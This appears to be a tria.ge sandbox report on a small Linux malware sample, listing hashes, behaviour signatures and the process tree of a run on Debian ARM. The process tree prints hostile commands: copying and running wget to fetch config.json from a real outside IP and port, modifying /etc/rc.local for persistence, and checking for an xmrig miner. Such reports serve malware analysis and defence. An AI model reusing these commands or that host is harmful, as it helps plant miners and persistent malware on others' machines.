Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
135s -
max time network
148s -
platform
debian-9_armhf -
resource
debian9-armhf-20240226-en -
resource tags
arch:armhfimage:debian9-armhf-20240226-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
09/04/2024, 17:01
Static task
static1
Behavioral task
behavioral1
Sample
ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
Resource
ubuntu1804-amd64-20240226-en
Behavioral task
behavioral2
Sample
ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
Resource
debian9-armhf-20240226-en
Behavioral task
behavioral3
Sample
ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
Resource
debian9-mipsbe-20240226-en
Behavioral task
behavioral4
Sample
ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
Resource
debian9-mipsel-20240226-en
General
-
Target
ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
-
Size
2KB
-
MD5
ea79e6f3a96671aa051f677679c2bda0
-
SHA1
2e2f085e81e8e750da43d8217541404ab78461e9
-
SHA256
f60d0a378a482bde674b1e5d610bd8d3926468f59ced75e4d29776d14fa4c543
-
SHA512
ce1a0f0c3c233a3bfa2724961e9f0f4ae2b061a60560ec37f0acfabad931c6a5a13ae2477d363e855f586fb5e097d5a33c464e57fb8ab06641ac67afcff58fce
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/wget 694 wget -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies rc script 1 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
description ioc Process File opened for modification /etc/rc.local ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118 -
Reads CPU attributes 1 TTPs 1 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/17/stat ps File opened for reading /proc/20/stat ps File opened for reading /proc/286/status ps File opened for reading /proc/463/cmdline ps File opened for reading /proc/515/cmdline ps File opened for reading /proc/10/status ps File opened for reading /proc/109/status ps File opened for reading /proc/650/status ps File opened for reading /proc/16/stat ps File opened for reading /proc/269/cmdline ps File opened for reading /proc/5/status ps File opened for reading /proc/76/status ps File opened for reading /proc/76/cmdline ps File opened for reading /proc/tty/drivers ps File opened for reading /proc/15/cmdline ps File opened for reading /proc/664/stat ps File opened for reading /proc/10/cmdline ps File opened for reading /proc/12/stat ps File opened for reading /proc/14/stat ps File opened for reading /proc/22/status ps File opened for reading /proc/9/status ps File opened for reading /proc/515/status ps File opened for reading /proc/26/stat ps File opened for reading /proc/41/status ps File opened for reading /proc/43/cmdline ps File opened for reading /proc/108/stat ps File opened for reading /proc/270/status ps File opened for reading /proc/25/status ps File opened for reading /proc/303/stat ps File opened for reading /proc/670/status ps File opened for reading /proc/676/cmdline ps File opened for reading /proc/6/stat ps File opened for reading /proc/6/status ps File opened for reading /proc/149/cmdline ps File opened for reading /proc/303/cmdline ps File opened for reading /proc/1/status ps File opened for reading /proc/17/status ps File opened for reading /proc/21/status ps File opened for reading /proc/23/stat ps File opened for reading /proc/24/stat ps File opened for reading /proc/25/stat ps File opened for reading /proc/8/status ps File opened for reading /proc/18/stat ps File opened for reading /proc/19/status ps File opened for reading /proc/109/stat ps File opened for reading /proc/269/stat ps File opened for reading /proc/2/stat ps File opened for reading /proc/7/cmdline ps File opened for reading /proc/23/status ps File opened for reading /proc/212/status ps File opened for reading /proc/463/status ps File opened for reading /proc/18/status ps File opened for reading /proc/106/status ps File opened for reading /proc/677/cmdline ps File opened for reading /proc/143/cmdline ps File opened for reading /proc/286/cmdline ps File opened for reading /proc/6/cmdline ps File opened for reading /proc/16/cmdline ps File opened for reading /proc/303/status ps File opened for reading /proc/670/stat ps File opened for reading /proc/675/status ps File opened for reading /proc/1/stat ps File opened for reading /proc/10/stat ps File opened for reading /proc/451/status ps -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/wget cp
Processes
-
/tmp/ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118/tmp/ea79e6f3a96671aa051f677679c2bda0_JaffaCakes1181⤵
- Modifies rc script
PID:664 -
/bin/cpcp /usr/bin/wget .2⤵
- Writes file to tmp directory
PID:687
-
-
/bin/chmodchmod +x wget2⤵PID:691
-
-
/tmp/wget./wget -P /tmp/ http://103.45.185.68:6358/config.json2⤵
- Executes dropped EXE
PID:694
-
-
/bin/grepgrep /etc/mlwk.sh1⤵PID:668
-
/bin/catcat /etc/rc.local1⤵PID:667
-
/bin/grepgrep -v grep1⤵PID:669
-
/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
PID:676
-
/bin/grepgrep /tmp/xmrig1⤵PID:677
-
/bin/grepgrep -v grep1⤵PID:678
-
/usr/bin/wcwc -l1⤵PID:680
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
18B
MD52e5bcdd3b23224ecae22093a9349b20a
SHA1b4a63c6da233638e105eb63db7c2bf6dcf9b11c3
SHA2564157be04ebab2c4aa0df84f890df6062723225e8dc19cabc475f4febc5c8a77d
SHA512c40cd9dad61486ab872ed7d05bbdfd7ac55d22c8b12e113aa84b9ee664d5744c40807d9b7bd7390e4c570874418bdcc14695017fbffb5dabeaf58dd60ce66af7
-
Filesize
350KB
MD526392b160bd9b6d9bf3c0facd3867923
SHA15033b8205423a646870b764431f1e4d6149f8e6b
SHA2569dbe55f22b2388874cf78164c1ed0794d402b5b457904b3e0319430abe3cf532
SHA512edf7b4d968dbe930d9cd892edf3a0295751298144c5828af15a32a566e4f8d5515f899a620997eab81868de81fb502767e0e0ab83e1c612d1f84c1463bfdbe00